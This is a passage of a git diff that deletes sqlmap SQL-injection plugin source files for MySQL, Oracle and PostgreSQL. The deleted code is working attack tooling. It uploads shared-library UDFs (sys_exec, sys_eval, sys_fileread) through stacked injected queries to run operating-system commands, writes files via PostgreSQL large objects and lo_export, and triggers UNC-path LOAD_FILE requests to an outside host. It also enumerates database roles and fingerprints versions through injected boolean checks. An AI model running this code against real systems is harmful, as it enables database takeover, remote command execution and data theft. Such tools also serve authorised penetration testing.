-from plugins.generic.syntax import Syntax as GenericSyntax - -class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - - @staticmethod - def escape(expression, quote=True): - """ - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - 'SELECT 0x6162636465666768 FROM foobar' - """ - - def escaper(value): - retVal = None - try: - retVal = "0x%s" % binascii.hexlify(value) - except UnicodeEncodeError: - retVal = "CONVERT(0x%s USING utf8)" % "".join("%.2x" % ord(_) for _ in utf8encode(value)) - return retVal - - return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py deleted file mode 100644 index f3c26d1e..00000000 --- a/plugins/dbms/mysql/takeover.py +++ /dev/null @@ -1,119 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re - -from lib.core.agent import agent -from lib.core.common import Backend -from lib.core.common import decloakToTemp -from lib.core.common import isStackingAvailable -from lib.core.common import normalizePath -from lib.core.common import ntToPosixSlashes -from lib.core.common import randomStr -from lib.core.common import unArrayizeValue -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import paths -from lib.core.enums import OS -from lib.request import inject -from lib.request.connect import Connect as Request -from plugins.generic.takeover import Takeover as GenericTakeover - -class Takeover(GenericTakeover): - def __init__(self): - self.__basedir = None - self.__datadir = None - self.__plugindir = None - - GenericTakeover.__init__(self) - - def udfSetRemotePath(self): - self.getVersionFromBanner() - - banVer = kb.bannerFp["dbmsVersion"] - - if banVer >= "5.0.67": - if self.__plugindir is None: - logger.info("retrieving MySQL plugin directory absolute path") - self.__plugindir = 
unArrayizeValue(inject.getValue("SELECT @@plugin_dir")) - - # On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0 - if self.__plugindir is None and banVer >= "5.1.19": - logger.info("retrieving MySQL base directory absolute path") - - # Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_basedir - self.__basedir = unArrayizeValue(inject.getValue("SELECT @@basedir")) - - if re.search("^[\w]\:[\/\\\\]+", (self.__basedir or ""), re.I): - Backend.setOs(OS.WINDOWS) - else: - Backend.setOs(OS.LINUX) - - # The DLL must be in C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin - if Backend.isOs(OS.WINDOWS): - self.__plugindir = "%s/lib/plugin" % self.__basedir - else: - self.__plugindir = "%s/lib/mysql/plugin" % self.__basedir - - self.__plugindir = ntToPosixSlashes(normalizePath(self.__plugindir)) or '.' - - self.udfRemoteFile = "%s/%s.%s" % (self.__plugindir, self.udfSharedLibName, self.udfSharedLibExt) - - # On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file - # On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file - else: - #logger.debug("retrieving MySQL data directory absolute path") - - # Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_datadir - #self.__datadir = inject.getValue("SELECT @@datadir") - - # NOTE: specifying the relative path as './udf.dll' - # saves in @@datadir on both MySQL 4.1 and MySQL 5.0 - self.__datadir = '.' 
- self.__datadir = ntToPosixSlashes(normalizePath(self.__datadir)) - - # The DLL can be in either C:\WINDOWS, C:\WINDOWS\system, - # C:\WINDOWS\system32, @@basedir\bin or @@datadir - self.udfRemoteFile = "%s/%s.%s" % (self.__datadir, self.udfSharedLibName, self.udfSharedLibExt) - - def udfSetLocalPaths(self): - self.udfLocalFile = paths.SQLMAP_UDF_PATH - self.udfSharedLibName = "libs%s" % randomStr(lowercase=True) - - if Backend.isOs(OS.WINDOWS): - _ = os.path.join(self.udfLocalFile, "mysql", "windows", "%d" % Backend.getArch(), "lib_mysqludf_sys.dll_") - self.udfLocalFile = decloakToTemp(_) - self.udfSharedLibExt = "dll" - else: - _ = os.path.join(self.udfLocalFile, "mysql", "linux", "%d" % Backend.getArch(), "lib_mysqludf_sys.so_") - self.udfLocalFile = decloakToTemp(_) - self.udfSharedLibExt = "so" - - def udfCreateFromSharedLib(self, udf, inpRet): - if udf in self.udfToCreate: - logger.info("creating UDF '%s' from the binary UDF file" % udf) - - ret = inpRet["return"] - - # Reference: http://dev.mysql.com/doc/refman/5.1/en/create-function-udf.html - inject.goStacked("DROP FUNCTION %s" % udf) - inject.goStacked("CREATE FUNCTION %s RETURNS %s SONAME '%s.%s'" % (udf, ret, self.udfSharedLibName, self.udfSharedLibExt)) - - self.createdUdf.add(udf) - else: - logger.debug("keeping existing UDF '%s' as requested" % udf) - - def uncPathRequest(self): - if not isStackingAvailable(): - query = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath) - query = agent.suffixQuery(query) - payload = agent.payload(newValue=query) - - Request.queryPage(payload) - else: - inject.goStacked("SELECT LOAD_FILE('%s')" % self.uncPath, silent=True) diff --git a/plugins/dbms/oracle/__init__.py b/plugins/dbms/oracle/__init__.py deleted file mode 100644 index 05e1872a..00000000 --- a/plugins/dbms/oracle/__init__.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission 
-""" - -from lib.core.enums import DBMS -from lib.core.settings import ORACLE_SYSTEM_DBS -from lib.core.unescaper import unescaper -from plugins.dbms.oracle.enumeration import Enumeration -from plugins.dbms.oracle.filesystem import Filesystem -from plugins.dbms.oracle.fingerprint import Fingerprint -from plugins.dbms.oracle.syntax import Syntax -from plugins.dbms.oracle.takeover import Takeover -from plugins.generic.misc import Miscellaneous - -class OracleMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): - """ - This class defines Oracle methods - """ - - def __init__(self): - self.excludeDbsList = ORACLE_SYSTEM_DBS - - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) - - unescaper[DBMS.ORACLE] = Syntax.escape diff --git a/plugins/dbms/oracle/connector.py b/plugins/dbms/oracle/connector.py deleted file mode 100644 index 8b821ba8..00000000 --- a/plugins/dbms/oracle/connector.py +++ /dev/null @@ -1,80 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -try: - import cx_Oracle -except ImportError: - pass - -import logging -import os - -from lib.core.convert import utf8encode -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from plugins.generic.connector import Connector as GenericConnector - -os.environ["NLS_LANG"] = ".AL32UTF8" - -class Connector(GenericConnector): - """ - Homepage: http://cx-oracle.sourceforge.net/ - User guide: http://cx-oracle.sourceforge.net/README.txt - API: http://cx-oracle.sourceforge.net/html/index.html - License: http://cx-oracle.sourceforge.net/LICENSE.txt - """ - - def __init__(self): - GenericConnector.__init__(self) - - def connect(self): - self.initConnection() - self.__dsn = cx_Oracle.makedsn(self.hostname, 
self.port, self.db) - self.__dsn = utf8encode(self.__dsn) - self.user = utf8encode(self.user) - self.password = utf8encode(self.password) - - try: - self.connector = cx_Oracle.connect(dsn=self.__dsn, user=self.user, password=self.password, mode=cx_Oracle.SYSDBA) - logger.info("successfully connected as SYSDBA") - except (cx_Oracle.OperationalError, cx_Oracle.DatabaseError, cx_Oracle.InterfaceError): - try: - self.connector = cx_Oracle.connect(dsn=self.__dsn, user=self.user, password=self.password) - except (cx_Oracle.OperationalError, cx_Oracle.DatabaseError, cx_Oracle.InterfaceError), msg: - raise SqlmapConnectionException(msg) - - self.initCursor() - self.printConnected() - - def fetchall(self): - try: - return self.cursor.fetchall() - except cx_Oracle.InterfaceError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg) - return None - - def execute(self, query): - retVal = False - - try: - self.cursor.execute(utf8encode(query)) - retVal = True - except cx_Oracle.DatabaseError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg) - - self.connector.commit() - - return retVal - - def select(self, query): - retVal = None - - if self.execute(query): - retVal = self.fetchall() - - return retVal diff --git a/plugins/dbms/oracle/enumeration.py b/plugins/dbms/oracle/enumeration.py deleted file mode 100644 index 030d46fb..00000000 --- a/plugins/dbms/oracle/enumeration.py +++ /dev/null @@ -1,166 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.common import getLimitRange -from lib.core.common import isAdminFromPrivileges -from lib.core.common import isInferenceAvailable -from lib.core.common import isNoneValue -from lib.core.common import isNumPosStrValue -from lib.core.common import isTechniqueAvailable -from lib.core.data import conf 
-from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import EXPECTED -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapNoneDataException -from lib.request import inject -from plugins.generic.enumeration import Enumeration as GenericEnumeration - -class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - - def getRoles(self, query2=False): - infoMsg = "fetching database users roles" - - rootQuery = queries[Backend.getIdentifiedDbms()].roles - - if conf.user == "CU": - infoMsg += " for current user" - conf.user = self.getCurrentUser() - - logger.info(infoMsg) - - # Set containing the list of DBMS administrators - areAdmins = set() - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - if query2: - query = rootQuery.inband.query2 - condition = rootQuery.inband.condition2 - else: - query = rootQuery.inband.query - condition = rootQuery.inband.condition - - if conf.user: - users = conf.user.split(",") - query += " WHERE " - query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) - - values = inject.getValue(query, blind=False, time=False) - - if not values and not query2: - infoMsg = "trying with table USER_ROLE_PRIVS" - logger.info(infoMsg) - - return self.getRoles(query2=True) - - if not isNoneValue(values): - for value in values: - user = None - roles = set() - - for count in xrange(0, len(value)): - # The first column is always the username - if count == 0: - user = value[count] - - # The other columns are the roles - else: - role = value[count] - - # In Oracle we get the list of roles as string - roles.add(role) - - if user in kb.data.cachedUsersRoles: - kb.data.cachedUsersRoles[user] = list(roles.union(kb.data.cachedUsersRoles[user])) - else: - kb.data.cachedUsersRoles[user] = list(roles) 
- - if not kb.data.cachedUsersRoles and isInferenceAvailable() and not conf.direct: - if conf.user: - users = conf.user.split(",") - else: - if not len(kb.data.cachedUsers): - users = self.getUsers() - else: - users = kb.data.cachedUsers - - retrievedUsers = set() - - for user in users: - unescapedUser = None - - if user in retrievedUsers: - continue - - infoMsg = "fetching number of roles " - infoMsg += "for user '%s'" % user - logger.info(infoMsg) - - if unescapedUser: - queryUser = unescapedUser - else: - queryUser = user - - if query2: - query = rootQuery.blind.count2 % queryUser - else: - query = rootQuery.blind.count % queryUser - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - if count != 0 and not query2: - infoMsg = "trying with table USER_SYS_PRIVS" - logger.info(infoMsg) - - return self.getPrivileges(query2=True) - - warnMsg = "unable to retrieve the number of " - warnMsg += "roles for user '%s'" % user - logger.warn(warnMsg) - continue - - infoMsg = "fetching roles for user '%s'" % user - logger.info(infoMsg) - - roles = set() - - indexRange = getLimitRange(count, plusOne=True) - - for index in indexRange: - if query2: - query = rootQuery.blind.query2 % (queryUser, index) - else: - query = rootQuery.blind.query % (queryUser, index) - role = inject.getValue(query, union=False, error=False) - - # In Oracle we get the list of roles as string - roles.add(role) - - if roles: - kb.data.cachedUsersRoles[user] = list(roles) - else: - warnMsg = "unable to retrieve the roles " - warnMsg += "for user '%s'" % user - logger.warn(warnMsg) - - retrievedUsers.add(user) - - if not kb.data.cachedUsersRoles: - errMsg = "unable to retrieve the roles " - errMsg += "for the database users" - raise SqlmapNoneDataException(errMsg) - - for user, privileges in kb.data.cachedUsersRoles.items(): - if isAdminFromPrivileges(privileges): - areAdmins.add(user) - - return 
kb.data.cachedUsersRoles, areAdmins diff --git a/plugins/dbms/oracle/filesystem.py b/plugins/dbms/oracle/filesystem.py deleted file mode 100644 index 6d054329..00000000 --- a/plugins/dbms/oracle/filesystem.py +++ /dev/null @@ -1,23 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.filesystem import Filesystem as GenericFilesystem - -class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): - errMsg = "File system read access not yet implemented for " - errMsg += "Oracle" - raise SqlmapUnsupportedFeatureException(errMsg) - - def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): - errMsg = "File system write access not yet implemented for " - errMsg += "Oracle" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py deleted file mode 100644 index a5321dbc..00000000 --- a/plugins/dbms/oracle/fingerprint.py +++ /dev/null @@ -1,125 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.session import setDbms -from lib.core.settings import ORACLE_ALIASES -from lib.request import inject -from plugins.generic.fingerprint import Fingerprint as GenericFingerprint - -class Fingerprint(GenericFingerprint): - def __init__(self): - GenericFingerprint.__init__(self, DBMS.ORACLE) - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp: - value += 
"%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp: - value += "%s\n" % dbmsOsFp - - value += "back-end DBMS: " - - if not conf.extensiveFp: - value += DBMS.ORACLE - return value - - actVer = Format.getDbms() - blank = " " * 15 - value += "active fingerprint: %s" % actVer - - if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - - htmlErrorFp = Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - return value - - def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(ORACLE_ALIASES) or (conf.dbms or "").lower() in ORACLE_ALIASES): - setDbms(DBMS.ORACLE) - - self.getBanner() - - return True - - infoMsg = "testing %s" % DBMS.ORACLE - logger.info(infoMsg) - - # NOTE: SELECT ROWNUM=ROWNUM FROM DUAL does not work connecting - # directly to the Oracle database - if conf.direct: - result = True - else: - result = inject.checkBooleanExpression("ROWNUM=ROWNUM") - - if result: - infoMsg = "confirming %s" % DBMS.ORACLE - logger.info(infoMsg) - - # NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does - # not work connecting directly to the Oracle database - if conf.direct: - result = True - else: - result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)") - - if not result: - warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE - logger.warn(warnMsg) - - return False - - setDbms(DBMS.ORACLE) - - self.getBanner() - - if not conf.extensiveFp: - return True - - infoMsg = "actively fingerprinting %s" % DBMS.ORACLE - logger.info(infoMsg) - - for version in ("11i", "10g", "9i", "8i"): - number = int(re.search("([\d]+)", version).group(1)) - output = inject.checkBooleanExpression("%d=(SELECT SUBSTR((VERSION),1,%d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" 
% (number, 1 if number < 10 else 2)) - - if output: - Backend.setVersion(version) - break - - return True - else: - warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE - logger.warn(warnMsg) - - return False - - def forceDbmsEnum(self): - if conf.db: - conf.db = conf.db.upper() - - if conf.tbl: - conf.tbl = conf.tbl.upper() diff --git a/plugins/dbms/oracle/syntax.py b/plugins/dbms/oracle/syntax.py deleted file mode 100644 index c30e68ea..00000000 --- a/plugins/dbms/oracle/syntax.py +++ /dev/null @@ -1,24 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.syntax import Syntax as GenericSyntax - -class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - - @staticmethod - def escape(expression, quote=True): - """ - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - 'SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar' - """ - - def escaper(value): - return "||".join("%s(%d)" % ("CHR" if ord(value[i]) < 256 else "NCHR", ord(value[i])) for i in xrange(len(value))) - - return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/oracle/takeover.py b/plugins/dbms/oracle/takeover.py deleted file mode 100644 index 41aceb10..00000000 --- a/plugins/dbms/oracle/takeover.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.takeover import Takeover as GenericTakeover - -class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - - def osCmd(self): - errMsg = "Operating system command execution functionality not " - errMsg += "yet implemented for Oracle" - raise SqlmapUnsupportedFeatureException(errMsg) - - def 
osShell(self): - errMsg = "Operating system shell functionality not yet " - errMsg += "implemented for Oracle" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osPwn(self): - errMsg = "Operating system out-of-band control functionality " - errMsg += "not yet implemented for Oracle" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osSmb(self): - errMsg = "One click operating system out-of-band control " - errMsg += "functionality not yet implemented for Oracle" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/postgresql/__init__.py b/plugins/dbms/postgresql/__init__.py deleted file mode 100644 index ac082e05..00000000 --- a/plugins/dbms/postgresql/__init__.py +++ /dev/null @@ -1,40 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import DBMS -from lib.core.settings import PGSQL_SYSTEM_DBS -from lib.core.unescaper import unescaper -from plugins.dbms.postgresql.enumeration import Enumeration -from plugins.dbms.postgresql.filesystem import Filesystem -from plugins.dbms.postgresql.fingerprint import Fingerprint -from plugins.dbms.postgresql.syntax import Syntax -from plugins.dbms.postgresql.takeover import Takeover -from plugins.generic.misc import Miscellaneous - -class PostgreSQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): - """ - This class defines PostgreSQL methods - """ - - def __init__(self): - self.excludeDbsList = PGSQL_SYSTEM_DBS - self.sysUdfs = { - # UDF name: UDF parameters' input data-type and return data-type - "sys_exec": { "input": ["text"], "return": "int4" }, - "sys_eval": { "input": ["text"], "return": "text" }, - "sys_bineval": { "input": ["text"], "return": "int4" }, - "sys_fileread": { "input": ["text"], "return": "text" } - } - - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - 
Miscellaneous.__init__(self) - Takeover.__init__(self) - - unescaper[DBMS.PGSQL] = Syntax.escape diff --git a/plugins/dbms/postgresql/connector.py b/plugins/dbms/postgresql/connector.py deleted file mode 100644 index 4f4c218e..00000000 --- a/plugins/dbms/postgresql/connector.py +++ /dev/null @@ -1,75 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -try: - import psycopg2 - import psycopg2.extensions - psycopg2.extensions.register_type(psycopg2.extensions.UNICODE) - psycopg2.extensions.register_type(psycopg2.extensions.UNICODEARRAY) -except ImportError: - pass - -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from plugins.generic.connector import Connector as GenericConnector - -class Connector(GenericConnector): - """ - Homepage: http://initd.org/psycopg/ - User guide: http://initd.org/psycopg/docs/ - API: http://initd.org/psycopg/docs/genindex.html - Debian package: python-psycopg2 - License: GPL - - Possible connectors: http://wiki.python.org/moin/PostgreSQL - """ - - def __init__(self): - GenericConnector.__init__(self) - - def connect(self): - self.initConnection() - - try: - self.connector = psycopg2.connect(host=self.hostname, user=self.user, password=self.password, database=self.db, port=self.port) - except psycopg2.OperationalError, msg: - raise SqlmapConnectionException(msg) - - self.connector.set_client_encoding('UNICODE') - - self.initCursor() - self.printConnected() - - def fetchall(self): - try: - return self.cursor.fetchall() - except psycopg2.ProgrammingError, msg: - logger.warn(msg) - return None - - def execute(self, query): - retVal = False - - try: - self.cursor.execute(query) - retVal = True - except (psycopg2.OperationalError, psycopg2.ProgrammingError), msg: - logger.warn(("(remote) %s" % msg).strip()) - except psycopg2.InternalError, msg: - raise SqlmapConnectionException(msg) - - 
self.connector.commit() - - return retVal - - def select(self, query): - retVal = None - - if self.execute(query): - retVal = self.fetchall() - - return retVal diff --git a/plugins/dbms/postgresql/enumeration.py b/plugins/dbms/postgresql/enumeration.py deleted file mode 100644 index b8cb078a..00000000 --- a/plugins/dbms/postgresql/enumeration.py +++ /dev/null @@ -1,18 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.data import logger - -from plugins.generic.enumeration import Enumeration as GenericEnumeration - -class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - - def getHostname(self): - warnMsg = "on PostgreSQL it is not possible to enumerate the hostname" - logger.warn(warnMsg) diff --git a/plugins/dbms/postgresql/filesystem.py b/plugins/dbms/postgresql/filesystem.py deleted file mode 100644 index 2a04da9d..00000000 --- a/plugins/dbms/postgresql/filesystem.py +++ /dev/null @@ -1,80 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os - -from lib.core.common import randomInt -from lib.core.data import logger -from lib.core.exception import SqlmapUnsupportedFeatureException -from lib.core.settings import LOBLKSIZE -from lib.request import inject -from plugins.generic.filesystem import Filesystem as GenericFilesystem - -class Filesystem(GenericFilesystem): - def __init__(self): - self.oid = None - self.page = None - - GenericFilesystem.__init__(self) - - def stackedReadFile(self, rFile): - infoMsg = "fetching file: '%s'" % rFile - logger.info(infoMsg) - - self.initEnv() - - return self.udfEvalCmd(cmd=rFile, udfName="sys_fileread") - - def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False): - errMsg = "PostgreSQL does not support file upload with UNION " - errMsg += 
"query SQL injection technique" - raise SqlmapUnsupportedFeatureException(errMsg) - - def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): - wFileSize = os.path.getsize(wFile) - content = open(wFile, "rb").read() - - self.oid = randomInt() - self.page = 0 - - self.createSupportTbl(self.fileTblName, self.tblField, "text") - - debugMsg = "create a new OID for a large object, it implicitly " - debugMsg += "adds an entry in the large objects system table" - logger.debug(debugMsg) - - # References: - # http://www.postgresql.org/docs/8.3/interactive/largeobjects.html - # http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html - - inject.goStacked("SELECT lo_unlink(%d)" % self.oid) - inject.goStacked("SELECT lo_create(%d)" % self.oid) - inject.goStacked("DELETE FROM pg_largeobject WHERE loid=%d" % self.oid) - - for offset in xrange(0, wFileSize, LOBLKSIZE): - fcEncodedList = self.fileContentEncode(content[offset:offset + LOBLKSIZE], "base64", False) - sqlQueries = self.fileToSqlQueries(fcEncodedList) - - for sqlQuery in sqlQueries: - inject.goStacked(sqlQuery) - - inject.goStacked("INSERT INTO pg_largeobject VALUES (%d, %d, DECODE((SELECT %s FROM %s), 'base64'))" % (self.oid, self.page, self.tblField, self.fileTblName)) - inject.goStacked("DELETE FROM %s" % self.fileTblName) - - self.page += 1 - - debugMsg = "exporting the OID %s file content to " % fileType - debugMsg += "file '%s'" % dFile - logger.debug(debugMsg) - - inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, dFile), silent=True) - - written = self.askCheckWrittenFile(wFile, dFile, forceCheck) - - inject.goStacked("SELECT lo_unlink(%d)" % self.oid) - - return written diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py deleted file mode 100644 index 6b371e19..00000000 --- a/plugins/dbms/postgresql/fingerprint.py +++ /dev/null @@ -1,171 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See 
the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.enums import OS -from lib.core.session import setDbms -from lib.core.settings import PGSQL_ALIASES -from lib.request import inject -from plugins.generic.fingerprint import Fingerprint as GenericFingerprint - -class Fingerprint(GenericFingerprint): - def __init__(self): - GenericFingerprint.__init__(self, DBMS.PGSQL) - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp: - value += "%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp: - value += "%s\n" % dbmsOsFp - - value += "back-end DBMS: " - - if not conf.extensiveFp: - value += DBMS.PGSQL - return value - - actVer = Format.getDbms() - blank = " " * 15 - value += "active fingerprint: %s" % actVer - - if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - - htmlErrorFp = Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - return value - - def checkDbms(self): - """ - References for fingerprint: - - * http://www.postgresql.org/docs/9.1/interactive/release.html (up to 9.1.3) - """ - - if not conf.extensiveFp and (Backend.isDbmsWithin(PGSQL_ALIASES) or (conf.dbms or "").lower() in PGSQL_ALIASES): - setDbms(DBMS.PGSQL) - - self.getBanner() - - return True - - infoMsg = "testing %s" % DBMS.PGSQL - logger.info(infoMsg) - - result = inject.checkBooleanExpression("[RANDNUM]::int=[RANDNUM]") - - if result: - infoMsg = "confirming %s" % DBMS.PGSQL - logger.info(infoMsg) - - result = 
inject.checkBooleanExpression("COALESCE([RANDNUM], NULL)=[RANDNUM]") - - if not result: - warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL - logger.warn(warnMsg) - - return False - - setDbms(DBMS.PGSQL) - - self.getBanner() - - if not conf.extensiveFp: - return True - - infoMsg = "actively fingerprinting %s" % DBMS.PGSQL - logger.info(infoMsg) - - if inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"): - Backend.setVersion(">= 9.1.0") - elif inject.checkBooleanExpression("LENGTH(TO_CHAR(1,'EEEE'))>0"): - Backend.setVersionList([">= 9.0.0", "< 9.1.0"]) - elif inject.checkBooleanExpression("2=(SELECT DIV(6,3))"): - Backend.setVersionList([">= 8.4.0", "< 9.0.0"]) - elif inject.checkBooleanExpression("EXTRACT(ISODOW FROM CURRENT_TIMESTAMP)<8"): - Backend.setVersionList([">= 8.3.0", "< 8.4.0"]) - elif inject.checkBooleanExpression("ISFINITE(TRANSACTION_TIMESTAMP())"): - Backend.setVersionList([">= 8.2.0", "< 8.3.0"]) - elif inject.checkBooleanExpression("9=(SELECT GREATEST(5,9,1))"): - Backend.setVersionList([">= 8.1.0", "< 8.2.0"]) - elif inject.checkBooleanExpression("3=(SELECT WIDTH_BUCKET(5.35,0.024,10.06,5))"): - Backend.setVersionList([">= 8.0.0", "< 8.1.0"]) - elif inject.checkBooleanExpression("'d'=(SELECT SUBSTR(MD5('sqlmap'),1,1))"): - Backend.setVersionList([">= 7.4.0", "< 8.0.0"]) - elif inject.checkBooleanExpression("'p'=(SELECT SUBSTR(CURRENT_SCHEMA(),1,1))"): - Backend.setVersionList([">= 7.3.0", "< 7.4.0"]) - elif inject.checkBooleanExpression("8=(SELECT BIT_LENGTH(1))"): - Backend.setVersionList([">= 7.2.0", "< 7.3.0"]) - elif inject.checkBooleanExpression("'a'=(SELECT SUBSTR(QUOTE_LITERAL('a'),2,1))"): - Backend.setVersionList([">= 7.1.0", "< 7.2.0"]) - elif inject.checkBooleanExpression("8=(SELECT POW(2,3))"): - Backend.setVersionList([">= 7.0.0", "< 7.1.0"]) - elif inject.checkBooleanExpression("'a'=(SELECT MAX('a'))"): - Backend.setVersionList([">= 6.5.0", "< 6.5.3"]) - elif inject.checkBooleanExpression("VERSION()=VERSION()"): - 
